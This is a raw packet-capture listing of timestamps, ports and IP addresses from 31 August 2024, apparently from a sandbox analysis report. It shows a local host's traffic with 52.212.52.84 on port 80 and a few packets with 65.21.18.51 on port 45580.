Aug 31, 2024 15:44:17.962568045 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.962574959 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.962590933 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.962599993 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.962620974 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.962620974 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.962646008 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.962658882 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.962672949 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.962709904 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.006285906 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.048441887 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.048458099 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.048479080 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.048494101 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.048504114 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.048510075 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.048512936 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.048525095 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.048525095 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.048547029 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.048563957 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.048594952 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.048605919 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.048614979 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.048630953 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.048636913 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.048643112 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.048651934 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.048655033 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.048666954 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.048672915 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.048680067 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.048685074 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.048692942 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.048726082 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.048734903 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.048800945 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.048813105 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.048823118 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.048830986 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.048842907 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.048845053 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.048855066 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.048862934 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.048873901 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.048875093 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.048885107 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.048890114 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.048896074 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.048906088 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.048911095 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.048917055 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.048929930 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.048938036 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.048947096 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.048957109 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.048958063 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.048968077 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.048976898 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.048986912 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.048988104 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.048999071 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.049009085 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.049025059 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.049561024 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.049578905 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.049602032 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.049614906 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.049633026 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.049644947 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.049654961 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.049664974 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.049674988 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.049678087 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.049685955 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.049689054 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.049709082 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.049716949 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.049734116 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.049736023 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.049745083 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.049757004 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.049766064 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.049774885 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.049788952 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.049798965 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.049846888 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.049858093 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.049866915 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.049875021 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.049880981 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.049887896 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.049899101 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.049912930 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.049917936 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.049923897 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.049958944 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.050023079 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.050034046 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.050043106 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.050055027 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.050065994 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.050081968 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.050097942 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.050163984 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.050174952 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.050184011 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.050206900 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.050215006 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.050234079 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.050250053 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.050259113 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.050270081 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.050276995 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.050281048 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.050286055 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.050311089 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.050319910 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.050343037 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.050353050 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.050362110 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.050371885 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.050379038 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.050383091 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.050394058 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.050399065 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.050405025 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.050411940 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.050415993 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.050432920 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.050443888 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.050462008 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.050976992 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.050986052 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.050991058 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.051023960 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.051031113 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.051045895 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.051054955 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.051065922 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.051071882 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.051076889 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.051090956 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.051110029 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.051120996 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.051131010 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.051171064 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.051240921 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.051250935 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.051260948 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.051276922 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.051285028 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.051296949 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.051302910 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.051310062 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.051311970 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.051325083 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.051333904 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.051342010 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.051343918 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.051356077 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.051357985 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.051374912 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.051374912 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.051383018 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.051387072 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.051398993 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.051402092 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.051414967 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.051431894 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.051434994 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.051469088 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.052257061 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.052299976 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.052345037 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.052355051 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.052370071 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.052380085 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.052382946 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.052390099 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.052397966 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.052405119 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.052418947 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.052422047 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.052433014 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.052433968 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.052443981 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.052448034 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.052455902 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.052464962 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.052469015 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.052474976 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.052489996 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.052493095 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.052505016 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.052505016 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.052525043 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.052529097 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.052542925 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.052570105 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.053041935 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.053052902 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.053061962 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.053087950 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.053097963 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.053121090 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.053133011 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.053142071 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.053149939 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.053159952 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.053160906 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.053179979 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.053189039 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.053257942 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.053294897 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.053316116 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.053356886 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.053383112 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.053405046 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.053416967 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.053428888 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.053430080 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.053440094 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.053442001 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.053453922 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.053476095 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.053477049 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.056315899 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.130578041 CEST	45580	49721	65.21.18.51	192.168.2.5
Aug 31, 2024 15:44:18.131624937 CEST	49721	45580	192.168.2.5	65.21.18.51
Aug 31, 2024 15:44:18.136423111 CEST	45580	49721	65.21.18.51	192.168.2.5
Aug 31, 2024 15:44:18.141318083 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.141370058 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.141391039 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.141403913 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.141417027 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.141442060 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.141443014 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.141453981 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.141464949 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.141469955 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.141477108 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.141493082 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.141501904 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.141526937 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.141593933 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.141612053 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.141630888 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.141638994 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.141643047 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.141654968 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.141664028 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.141664028 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.141675949 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.141685963 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.141686916 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.141704082 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.141705990 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.141721010 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.141732931 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.141733885 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.141745090 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.141756058 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.141762018 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.141767025 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.141777039 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.141779900 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.141798973 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.141808033 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.141810894 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.141823053 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.141834021 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.141835928 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.141844988 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.141844988 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.141870975 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.141874075 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.141875029 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.141880989 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.141886950 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.141899109 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.141931057 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.141944885 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.141989946 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.142000914 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.142011881 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.142040014 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.142051935 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.142064095 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.142076015 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.142086029 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.142097950 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.142108917 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.142113924 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.142152071 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.142152071 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.142174959 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.142190933 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.142209053 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.142219067 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.142229080 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.142234087 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.142242908 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.142254114 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.142258883 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.142266035 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.142270088 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.142301083 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.142327070 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.142450094 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.142462015 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.142473936 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.142483950 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.142494917 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.142496109 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.142508030 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.142519951 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.142522097 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.142532110 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.142540932 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.142564058 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.142585993 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.142595053 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.142605066 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.142616987 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.142627001 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.142637014 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.142646074 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.142648935 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.142662048 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.142690897 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.142724037 CEST	80	49727	52.212.52.84	192.168.2.5
